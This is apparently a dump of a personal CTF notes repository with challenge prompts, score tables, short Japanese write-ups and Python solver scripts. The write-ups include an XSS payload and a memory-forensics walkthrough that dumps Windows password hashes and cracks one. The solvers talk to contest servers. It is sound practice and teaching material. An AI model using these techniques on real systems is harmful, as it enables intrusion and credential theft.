"length_bytes": 447, "license_type": "no_license", "max_line_length": 116, "num_lines": 11, "path": "/2020/pbctf_2020/Ainissesthai/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A team of codebreakers had to invent computers to break this cipher. Can you figure out what the flag is?\n\nRemote: `nc ainissesthai.chal.perfect.blue 1`\n\nNote: enter flag as `pbctf{UPPERCASEPLAINTEXT}`\n\nBy: UnblvR\n\n[ainissesthai.py](https://storage.googleapis.com/pbctf-2020-ctfd/2b5b7afd062857896e90103dccb0785b/ainissesthai.py)\n\n[requirements.txt](https://storage.googleapis.com/pbctf-2020-ctfd/0bc784d368759bd74ac76a5ecf6127f8/requirements.txt)" }, { "alpha_fraction": 0.35049018263816833, "alphanum_fraction": 0.44607841968536377, "avg_line_length": 16.782608032226562, "blob_id": "6a8ce4b37351f5e510dd397edd1152740ed10429", "content_id": "615852d027f78c4f186549238895b755bc9b3ad4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 410, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/2021/BambooFox_CTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# BambooFox CTF 2021\n\n* https://ctf.bamboofox.tw/\n\n* 2021/01/16 11:00 JST — 2021/01/18 11:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------- | ------- | ----: | -----: |\n| Reversing | [Flag Checker](Flag_Checker) | Verilog | 50 | ? |\n\n### Unsolved\n\n---\n\n## Result\n\n* 51 points\n\n* 169 / 513 (> 1 pt)" }, { "alpha_fraction": 0.6300366520881653, "alphanum_fraction": 0.7399267554283142, "avg_line_length": 17.266666412353516, "blob_id": "dbd7420479709551d38a6c623e704e0d795ab345", "content_id": "b6d32af67a820859edbd1d687b90af67f8b2ae03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 485, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/2020/WaniCTF/striped_table/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n指定のページでは、メモを登録して表示できるようになっている。\n\n![](img/2020-11-22-14-16-28.png)\n\nどうやら、タイトルとメモの内容が直接表示されているので、`alert(19640503)`が実行できるようにメモの内容に以下を入力して登録する。\n\n```html\n<script>alert(19640503);</script>\n```\n\n`<script>`タグの内容が実行され、フラグも取得できる。\n\n<!-- FLAG{simple_cross_site_scripting} -->" }, { "alpha_fraction": 0.7409201264381409, "alphanum_fraction": 0.7578692436218262, "avg_line_length": 26.600000381469727, "blob_id": "76d4037106398e9ccbe52a85e47e65784a90216a", "content_id": "97d5d446c6bb143d23a39730c93b4d45dcffe229", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 413, "license_type": "no_license", "max_line_length": 158, "num_lines": 15, "path": "/2021/BCACTF_2.0/Zstegosaurus/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend forgot our pet zstegosaurus's name. Luckily for him, I hid the dinosaur's name somewhere in this picture...but now I can't find it. Can you help us?\n\n[zstegosaurus.png](https://objects.bcactf.com/bcactf2/zstegosaurus/zstegosaurus.png)\n\nHint 1 of 3\n\nThe image should be black and white...right?\n\nHint 2 of 3\n\nTry opening the file in a hex editor.\n\nHint 3 of 3\n\nThe format for the flag is bcactf{flagName}" }, { "alpha_fraction": 0.7888198494911194, "alphanum_fraction": 0.7888198494911194, "avg_line_length": 31.200000762939453, "blob_id": "fa9a1d99ca9509e57fd9de7a7adfe07694dbe99e", "content_id": "d6f2af7493d56f5af711d21c4a903f64a40a1f06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 122, "num_lines": 5, "path": "/2021/HeroCTF_v3/We_need_you_3_5/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We know for sure that this server allowed to connect to infected machines. Can you check if a connection was instantiated?\n\nAuthor: Worty\n\nFormat: Hero{IP:Port}\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7678571343421936, "avg_line_length": 21.600000381469727, "blob_id": "31fac752a35dc57c127d090d05488c37e3dc80ca", "content_id": "90971e4ae71af876949ca2f76474b8ad76993e0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 206, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/2020/WaniCTF/DevTools_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n問題文の指示通り、開発者ツール[F12]を使ってページのソースを見るとフラグがコメント行で書かれている。\n\n<!-- FLAG{you_can_read_html_using_devtools} -->" }, { "alpha_fraction": 0.6441717743873596, "alphanum_fraction": 0.7914110422134399, "avg_line_length": 53.33333206176758, "blob_id": "d2529d2452e9bf05bd079b9f31e587b59a732d10", "content_id": "8ae21a4415133e1dbbe2b792c553cfb240c9e107", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 163, "license_type": "no_license", "max_line_length": 110, "num_lines": 3, "path": "/2021/RaRCTF_2021/babycrypt/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's not a CTF without a baby RSA challenge right?\n\n[server.py - 669ede](https://files-ctf.rars.win/challenge-files/26/669ede7b0f3a468e12f1fc95a65694df/server.py)\n" }, { "alpha_fraction": 0.5185185074806213, "alphanum_fraction": 0.5491143465042114, "avg_line_length": 23.84000015258789, "blob_id": "b077d2c46e5bdca0a1091230e5322073663c1833", "content_id": "6ff3d806718d805b4f7e366c9857d4b86e4d6a29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "no_license", "max_line_length": 54, "num_lines": 25, "path": "/2021/UIUCTF_2021/dhke_intro/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Cipher import AES\n\nfor k in range(31):\n k = str(k)\n\n # pad key to 16 bytes (128bit)\n key = \"\"\n i = 0\n padding = \"uiuctf2021uiuctf2021\"\n while (16 - len(key) != len(k)):\n key = key + padding[i]\n i += 1\n key = key + k\n key = bytes(key, encoding='ascii')\n\n with open('output.txt', 'rb') as f:\n out = bytes.fromhex(f.read().decode())\n\n iv = bytes(\"kono DIO daaaaaa\", encoding = 'ascii')\n cipher = AES.new(key, AES.MODE_CFB, iv)\n ciphertext = cipher.decrypt(out)\n\n if b'uiuctf' in ciphertext:\n print(f'{key = }')\n print(f'{ciphertext = }')\n" }, { "alpha_fraction": 0.27734139561653137, "alphanum_fraction": 0.6725075244903564, "avg_line_length": 34.23404312133789, "blob_id": "10e392683934bb3fd9d351f7fd7e2c2805f3bfcb", "content_id": "fcdb485f23f7774e625ec50249ed86419000d899", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1655, "license_type": "no_license", "max_line_length": 619, "num_lines": 47, "path": "/2020/CyberSecurityRumble2020/Pady_McPadface/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Original https://ctftime.org/writeup/24770\n\nfrom pwn import *\nfrom Crypto.Util.number import long_to_bytes\n\ncontext.log_level = \"error\"\n\n# get jacobi symbol\ndef jacobi(a, n):\n assert(n > a > 0 and n%2 == 1)\n t = 1\n while a != 0:\n while a % 2 == 0:\n a //= 2\n r = n % 8\n if r == 3 or r == 5:\n t = -t\n a, n = n, a\n if a % 4 == n % 4 == 3:\n t = -t\n a %= n\n if n == 1:\n return t\n else:\n return 0\n\nn=23946008544227658126007712372803958643232141489757386834260550742271224503035086875887914418064683964046938371640632153677880813529023769841157840969433316734058706481517878257755290676559343682013294580085557476138201639446709290119631383493940405818550255561589074538261117055296294434994144540224412018398452371792093095280080422459773487177339595746894989682038387107119249733105558301840478252766907821053044992141741079156669562032221433390029219634673005161989684970682781410366155504440886376453225497112165607897302209008685179791558898003720802478389914297472563728836647547791799771532020349546729665006643\n\nHOST = 'chal.cybersecurityrumble.de'\nPORT = 34187\nL = 263 # number of bits to retrieve\n\nsols = [0 for _ in range(L)]\nfor i in range(100):\n r = remote(HOST,PORT)\n res = r.recvall().split(b\"\\n\")\n cs = []\n for l in res:\n try:\n cs.append(int(l))\n except:\n pass\n assert len(cs) == L\n for j,c in enumerate(cs):\n if jacobi(c,n) == -1: # we are sure that it's not a square\n sols[j] = 1\n print( long_to_bytes( int(\"\".join(map(str,sols)),2)).decode(\"utf-8\") )" }, { "alpha_fraction": 0.7417040467262268, "alphanum_fraction": 0.7730941772460938, "avg_line_length": 78.71428680419922, "blob_id": "cd195b4160fcf48637624eb300d70c67492fee68", "content_id": "e72f58222aa89e034f14d42b84b9459c960ab13f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 468, "num_lines": 14, "path": "/2020/hxp_CTF_2020/Secure_Program_Config/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Description:\nPlease redownload the challenge; we fixed a packing issue.\nDue to corona, I’m in home office and yesterday, I (while not being completely sober) played around with some alarm systems of the clients and … apparently … changed my engineer password since I cannot access anything anymore … my boss has called this morning and threatened to fire me if I don’t fix that ASAP … I have not the slightest idea what my password could be or how I can get it back … can you please help me recover it???!! I have to fix that mess somehow …\n\nI removed the clients’ data to not get into even more trouble …\n\nBefore I forget: Download [SPC Connect Pro](https://www.spcconnectpro.com/install/setup.exe) and start it pointing to the folder `SPC Products`. (The software will ask you which directory it should use)\n\nOur company login to the software is `admin/admin`. Luckily, I did not change that …\n\nOh no … my boss is calling again … we talk later … good luck.\n\nDownload:\n[Secure Program Config-f0a3e4f922071458.tar.xz (716 Bytes)](https://2020.ctf.link/assets/files/Secure%20Program%20Config-f0a3e4f922071458.tar.xz)" }, { "alpha_fraction": 0.6724137663841248, "alphanum_fraction": 0.7068965435028076, "avg_line_length": 22.399999618530273, "blob_id": "898823707207f4de59ce49a4d8ab3e4ab0499890", "content_id": "bd85424d8d8d88e49abe07e30ad40a1c62eaa6f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/2021/Real_World_CTF_3rd/HOME/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nio = remote('home.realworldctf.com',1337)\nmsg = io.recvall()\nprint(msg.decode('ascii'))\nio.close()" }, { "alpha_fraction": 0.5065789222717285, "alphanum_fraction": 0.5197368264198303, "avg_line_length": 24.33333396911621, "blob_id": "4989fc80af52928dd6eb6b4db338a7a466d47c38", "content_id": "02c2710c0c7b91ee83c4d99b5f37137fef70dfe6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 304, "license_type": "no_license", "max_line_length": 60, "num_lines": 12, "path": "/2021/HeroCTF_v3/Ping_Pong/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nbinary = \"\"\nwith open(os.path.dirname(__file__)+\"/output.txt\",\"r\") as f:\n text = f.readline()\n while text:\n if \"PING\" in text:\n binary += \"1\"\n else :\n binary += \"0\"\n text = f.readline()\nprint(bytearray.fromhex(hex(int(binary,2))[2:]).decode())\n" }, { "alpha_fraction": 0.7989949584007263, "alphanum_fraction": 0.8174204230308533, "avg_line_length": 25, "blob_id": "7aceddf9773421f2aacf30c76b569ac4a480d25b", "content_id": "5017457a6614988bede7771ae4301daab9c74d06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 901, "license_type": "no_license", "max_line_length": 101, "num_lines": 23, "path": "/2020/WaniCTF/SQL_Challenge_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "問題ページ: https://sql2.wanictf.org/index.php?year=2011\n\nやっぱり前のページは危ない気がするからページを作り直したよ。これで大丈夫だね。\n\n(Hint)\n\nSQL injectionの問題です。\n\n必要に応じてソースコード(index.php)とデータベースのスキーマ(1_schema.sql)を参考にしてください。\n\n(注意)\n\nsql-chall-2.zipは問題を解くために必須の情報ではなく、docker-composeを利用してローカルで問題環境を再現するためのものです。\n\n興味のある方は利用してみてください。\n\n[index.php](https://score.wanictf.org/storage/qpgnvwdqxyeixrkqoleweqawlupzgylc/index.php)\n\n[1_schema.sql](https://score.wanictf.org/storage/eaecpxpaqwkkwaisxcfosjzplsbwwizu/1_schema.sql)\n\n[sql-chall-2.zip](https://score.wanictf.org/storage/qxuhakpsjjrywgjfmsngffmmapgcahqo/sql-chall-2.zip)\n\nWriter : okmt, nkt" }, { "alpha_fraction": 0.4740484356880188, "alphanum_fraction": 0.8615916967391968, "avg_line_length": 57, "blob_id": "f6abf90bdb3c76bda64170618cf8498e72e663c9", "content_id": "a585372389523b739e5bf345bc2a35a8c7680a9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 289, "license_type": "no_license", "max_line_length": 218, "num_lines": 5, "path": "/2020/HITCON_CTF_2020/AC1750/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My router is weird, can you help me find the problem?\n\n[ac1750-452ca8a9038502712d30c628d3444e5a22894611f1286b7a818203bdf838b434.tar.gz](https://hitcon-2020-quals.s3-ap-northeast-1.amazonaws.com/ac1750-452ca8a9038502712d30c628d3444e5a22894611f1286b7a818203bdf838b434.tar.gz)\n\nAuthor: Jeffxx" }, { "alpha_fraction": 0.443155437707901, "alphanum_fraction": 0.5023201704025269, "avg_line_length": 25.15151596069336, "blob_id": "27a6bacfdf207b245d2a852553e6df5c366d7001", "content_id": "9551228195907e6924d406e01ca4363e230a3601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 922, "license_type": "no_license", "max_line_length": 85, "num_lines": 33, "path": "/2020/Harekaze_mini_CTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Harekaze mini CTF 2020\n\n* https://ctf.harekaze.com/\n\n* 2020/12/26 10:00 JST — 2020/12/27 10:00 JST\n\n>@TeamHarekaze\n>ソースコードやソルバなどを含んだリポジトリを公開しました。\n>We have published challenge files, including source codes and solvers, on GitHub.\n>https://github.com/TeamHarekaze/harekaze-mini-ctf-2020-challenges-public\n>#HarekazeCTF\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --- | ------------------------------------------- | ------------ | ----: | -----: |\n| Web | [What time is it now?](What_time_is_it_now) | date command | 123 | 63 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | ---------- | ------------------- | ----: | -----: |\n| Crypto | [rsa](rsa) | RSA encrypt p and q | 186 | 25 |\n\n---\n\n## Result\n\n* 214 points\n\n* 82 / 134 (> 1 pt)" }, { "alpha_fraction": 0.5645090341567993, "alphanum_fraction": 0.8260678052902222, "avg_line_length": 46.33333206176758, "blob_id": "86a2fcc01fd44b99138ef2460affb49b9c4f0f32", "content_id": "4cc1298a50e3c97494ecfb377cf175e840652511", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2465, "license_type": "no_license", "max_line_length": 108, "num_lines": 48, "path": "/2020/WaniCTF/ALLIGATOR_03/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nzipファイルにはパスワードがついているので、`Volatility`を使って常用しているパスワードを調べる。\n\n[参考]\n\n* https://www.aldeid.com/wiki/Volatility/Retrieve-password\n\n```bash\n$ vol.py -f ALLIGATOR.raw --kdbg=0x82754de8 --profile=Win7SP1x86_23418 hivelist\nVolatility Foundation Volatility Framework 2.6.1\nVirtual Physical Name\n---------- ---------- ----\n0x96833008 0x29f35008 \\??\\C:\\System Volume Information\\Syscache.hve\n0x9a37a008 0x0edcf008 \\??\\C:\\Users\\ALLIGATOR\\ntuser.dat\n0x9a37c008 0x0eed1008 \\??\\C:\\Users\\ALLIGATOR\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat\n0x8780a6b8 0x282fb6b8 [no name]\n0x8781a008 0x28349008 \\REGISTRY\\MACHINE\\SYSTEM\n0x87838218 0x28367218 \\REGISTRY\\MACHINE\\HARDWARE\n0x8b0599c8 0x248859c8 \\??\\C:\\Windows\\ServiceProfiles\\LocalService\\NTUSER.DAT\n0x8cb07008 0x26f46008 \\Device\\HarddiskVolume1\\Boot\\BCD\n0x8e7f7008 0x26313008 \\SystemRoot\\System32\\Config\\SOFTWARE\n0x904655f8 0x225685f8 \\??\\C:\\Users\\IEUser\\ntuser.dat\n0x9144b5c0 0x260205c0 \\SystemRoot\\System32\\Config\\DEFAULT\n0x937338d0 0x250778d0 \\SystemRoot\\System32\\Config\\SECURITY\n0x93791458 0x1d940458 \\SystemRoot\\System32\\Config\\SAM\n0x937b79c8 0x248899c8 \\??\\C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat\n0x937fb758 0x248dd758 \\??\\C:\\Windows\\ServiceProfiles\\NetworkService\\NTUSER.DAT\n0x96449458 0x03f4f458 \\??\\C:\\Users\\sshd_server\\ntuser.dat\n0x9645d3d8 0x2830b3d8 \\??\\C:\\Users\\sshd_server\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat\n```\n\n```bash\n$ vol.py -f ALLIGATOR.raw --kdbg=0x82754de8 --profile=Win7SP1x86_23418 hashdump -y 0x8781a008 -s 0x93791458\nVolatility Foundation Volatility Framework 2.6.1\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nIEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::\nsshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nsshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::\nALLIGATOR:1003:aad3b435b51404eeaad3b435b51404ee:5e7a211fee4f7249f9db23e4a07d7590:::\n```\n\n[crackstation](https://crackstation.net/)を使うと、`5e7a211fee4f7249f9db23e4a07d7590`は`ilovewani`であることがわかる。\n\nzipファイルのパスワードは`ilovewani`で、中身を見るとフラグが書かれたテキストファイルがある。\n\n<!-- FLAG{The_Machikane_Crocodylidae} -->" }, { "alpha_fraction": 0.7747747898101807, "alphanum_fraction": 0.7762762904167175, "avg_line_length": 46.57143020629883, "blob_id": "36884845d5a0ef25fed223c5e350ab98ff7d438a", "content_id": "d9c7ff18ce045aad94c4ed3c74ca46ea3702da00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 666, "license_type": "no_license", "max_line_length": 196, "num_lines": 14, "path": "/2021/HeroCTF_v3/We_need_you_1_5/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Interpol and the FBI have been investigating for over a year now. They are trying to get their hands on two hackers very well known for their ransomware and their ultra efficient botnet.\n\nAfter long months of investigation, they managed to get their hands on one of their servers. But, when they got it back the PC caught fire because of a defense mechanism set up by the two hackers.\n\nThe hard drive could not be saved, but they had time to put the RAM in liquid nitrogen and analyze it later.\n\nYou know what you have to do!\n\nFor this first step, find the name of the PC!\n\nDownload, [here](http://chall0.heroctf.fr/Challenge.zip).\n\nAuthor: Worty\nFormat: Hero{Name}\n" }, { "alpha_fraction": 0.620853066444397, "alphanum_fraction": 0.7203791737556458, "avg_line_length": 22.44444465637207, "blob_id": "d108f2c10bd42749399eaeddbaf3cd241bd7b59f", "content_id": "b14c7028a5cf5fb5b38d1110b8980bd43db330b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 287, "license_type": "no_license", "max_line_length": 92, "num_lines": 9, "path": "/2021/ImaginaryCTF_2021/Roos_World/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[http://roos-world.chal.imaginaryctf.org](http://roos-world.chal.imaginaryctf.org/) にアクセスする。\n\n開発者ツールでコンソールを見たところフラグが出力されていた。\n\n![](img/2021-07-24-18-49-39.png)\n\n<!-- ictf{1nsp3ct0r_r00_g0es_th0nk} -->\n" }, { "alpha_fraction": 0.5300353169441223, "alphanum_fraction": 0.7243816256523132, "avg_line_length": 50.54545593261719, "blob_id": "afd987571f9deb2aa50421860e9812fc6692fd29", "content_id": "738672fc7f65211ac755dbede4b87aadd8c1287f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 566, "license_type": "no_license", "max_line_length": 291, "num_lines": 11, "path": "/2020/kksctf_open_2020/bson/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import bson\nfrom bson.codec_options import CodecOptions\n\ncodec_options = CodecOptions(unicode_decode_error_handler='ignore')\ns = b'\\x45\\x00\\x00\\x00\\x0b'+b'\\x82\\xa3\\x6b\\x65\\x79\\x5c\\xa4\\x66\\x6c\\x61\\x67\\xdc\\x00\\x31\\x37\\x37\\x2f\\x27\\x36\\x2f\\x6c\\x32\\x03\\x35\\x2f\\x03\\x3f\\x6c\\x6c\\x30\\x03\\x3e\\x29\\x28\\x03\\x34\\x3d\\x2a\\x6f\\x03\\x25\\x33\\x29\\x03\\x28\\x2e\\x35\\x39\\x38\\x03\\x31\\x6f\\x2f\\x2f\\x1c\\x3b\\x39\\x03\\x2c\\x3d\\x3f\\x37\\x21'+b'\\x00'\nbson_obj = bson.decode_iter(s,codec_options=codec_options)\nfor item in bson_obj:\n try:\n print(item)\n except Exception as e:\n pass" }, { "alpha_fraction": 0.670918345451355, "alphanum_fraction": 0.8010203838348389, "avg_line_length": 77.5999984741211, "blob_id": "ab4c322edb5c8c4f9958448ca082afd85a4a6e30", "content_id": "17a792adcc8a1ebf7ba741a3809e3064f79b9ccf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 392, "license_type": "no_license", "max_line_length": 270, "num_lines": 5, "path": "/2021/angstromCTF_2021/FREE_FLAGS!!1!!/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Clam was browsing armstrongctf.com when suddenly a popup appeared saying \"GET YOUR FREE FLAGS HERE!!!\" along with [a download](https://files.actf.co/6ddcb4e935b82c477140ee6833eceaf1149e0c732af1ba742a9e67db98693f88/free_flags). Can you fill out the survey for free flags?\n\nFind it on the shell server at `/problems/2021/free_flags` or over netcat at `nc shell.actf.co 21703`.\n\nAuthor: aplet123" }, { "alpha_fraction": 0.6601307392120361, "alphanum_fraction": 0.8169934749603271, "avg_line_length": 50, "blob_id": "8416fe0944d7c362584a157c9ae11b8143bd18b0", "content_id": "c85619bb82e35fad967f2e138f2486b0bbe0431f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/2021/dCTF_2021/Dont_let_it_run/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "PDF documents can contain unusual objects within.\n\n[dragon.pdf](https://dctf.dragonsec.si/files/07647a7658310091dd1e0856ab3a725e/dragon.pdf?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTUzfQ.YJ9LWw.n7iel59uw0jjClT3418izqzfQ7I)\n" }, { "alpha_fraction": 0.8678303956985474, "alphanum_fraction": 0.8678303956985474, "avg_line_length": 22.647058486938477, "blob_id": "944d66e351f46d50cf60dd63b5820509abb10974", "content_id": "8f01722d98c3edbefa6cb9a4644a4b859bc665e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 999, "license_type": "no_license", "max_line_length": 94, "num_lines": 17, "path": "/2020/WaniCTF/MQTT_Challenge/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "問題ページ: https://mqtt.wanictf.org\n\n噂の軽量プロトコル「MQTT」をテストするページを作ったよ。どこかに秘密のトピックがあるから探してみてね。\n\n(Hint)\n\n今回の問題ページではあらかじめ「nkt/test」というトピックをサブスクライブしており、他にも「nkt/hoge」「nkt/huga」などのトピックに対してパブリッシュが行われています。\n\n別のトピックを入力して「Subscribe」ボタンを押すとそのトピックをサブスクライブできるので、どうにかしてFLAGを配信しているトピックを見つけてください。\n\n(注意)\n\nデータが送信されてくる間隔は約一分程度になっているので、新たにトピックをサブスクライブした際などは少し様子を見てみてください。\n\nまれにコネクションが切れる場合があるので、様子がおかしいときはリロードしてください。\n\nWriter : nkt" }, { "alpha_fraction": 0.5741758346557617, "alphanum_fraction": 0.5906593203544617, "avg_line_length": 25.071428298950195, "blob_id": "c768cfb4baef0cd298feb3a87962a33b6957208f", "content_id": "28b9ea044290b0e0c8bf8a4c880875143e9fff85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/2020/pbctf_2020/Ainissesthai/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from string import ascii_uppercase as UC\n\ncipherlist = []\nwith open('./output.txt') as f:\n while True:\n cipher = f.readline()\n if len(cipher) < 1:\n break\n cipherlist.append(cipher[0:-1]) # exclude \\n\n\nfor i in range(17):\n string = [char[i] for char in cipherlist]\n diff = set(UC)-set(string)\n print(list(diff)[0],end='')" }, { "alpha_fraction": 0.3173241913318634, "alphanum_fraction": 0.3893653452396393, "avg_line_length": 19.13793182373047, "blob_id": "9c81998b3a55a7fdb588940d62855e548aca4cbc", "content_id": "3d43b2bef77f7f282266cedd0eafae1233cc0b83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 585, "license_type": "no_license", "max_line_length": 71, "num_lines": 29, "path": "/2020/KipodAfterFreeCTF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# KipodAfterFree CTF\n\n* https://ctf.kaf.sh/\n\n* 2020/11/07 02:00 JST — 2020/11/09 02:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------- | ------- | ----: | -----: |\n| Reversing | [SSE_KEYGENME](SSE_KEYGENME) | angr | 25 | 127 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------- | ------- | ----: | -----: |\n| Reversing | [8byte](8byte) | | | 39 |\n\n---\n\n## Result\n\n* 30 points\n\n* 109 / 624 (> 1 pts)" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.8024691343307495, "avg_line_length": 39.5, "blob_id": "6cd8ac8c2bf6a2528ec4751315393ade3c61be0b", "content_id": "2d64f49827754e0a4ada86b0e476d19167cb00d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 81, "license_type": "no_license", "max_line_length": 63, "num_lines": 2, "path": "/2021/dCTF_2021/Simple_web/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Time to warm up!\nhttp://dctf1-chall-simple-web.westeurope.azurecontainer.io:8080\n" }, { "alpha_fraction": 0.46355685591697693, "alphanum_fraction": 0.6180757880210876, "avg_line_length": 17.105262756347656, "blob_id": "7f34ee5a3baa2a79a77d66a13126c1e124ae0575", "content_id": "c28b0a84685b6f317007a886a6b36662ba53859a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 43, "num_lines": 19, "path": "/2021/DawgCTF_2021/TrashChain/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nA = 340282366920938460843936948965011886881\nio = remote(\"umbccd.io\",\"3100\")\n\ndef send_chain(num:[int]):\n for n in num:\n io.recvuntil('>')\n io.sendline(str(n))\n io.sendline('done')\n\n# chain 1\nsend_chain([A])\n\n# chain 2\nsend_chain([A*2, A*3-1, A*4-2, A*5-3])\n\nprint(io.recvall().decode('utf-8'))\nio.close()" }, { "alpha_fraction": 0.6354166865348816, "alphanum_fraction": 0.7847222089767456, "avg_line_length": 40.14285659790039, "blob_id": "8bca3595dbe78a83dbac46df0e0e8c28f0c5ed74", "content_id": "e0e1ba6ea747aaaaaeeaa87ea9dc3a2e7322c32e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 288, "license_type": "no_license", "max_line_length": 103, "num_lines": 7, "path": "/2021/UIUCTF_2021/dhke_intro/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Small numbers are bad in cryptography. This is why.\n\n**author**: whimsicott79@leftovers\n\n[dhkectf_intro.py](https://uiuc.tf/files/526ea49d71ad9da2203af841e4585dbc/dhkectf_intro.py?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjE5fQ.YQTuXw.y3Lx-PgV1rDXYMKndPWXJ0fJQTg)\n\n[output.txt](https://uiuc.tf/files/3c2fb5638b9110a809dbbf0093a74671/output.txt?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjIwfQ.YQTuXw.L0UCESpk3hkUbap6k3NyWzBk3Tw)\n" }, { "alpha_fraction": 0.7455357313156128, "alphanum_fraction": 0.7633928656578064, "avg_line_length": 74, "blob_id": "e2dc2a329002a3dd12f9ba01ad62cda343095a1d", "content_id": "7b6e6d4ce8776bf33f35a2fae3a1088917340df9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", 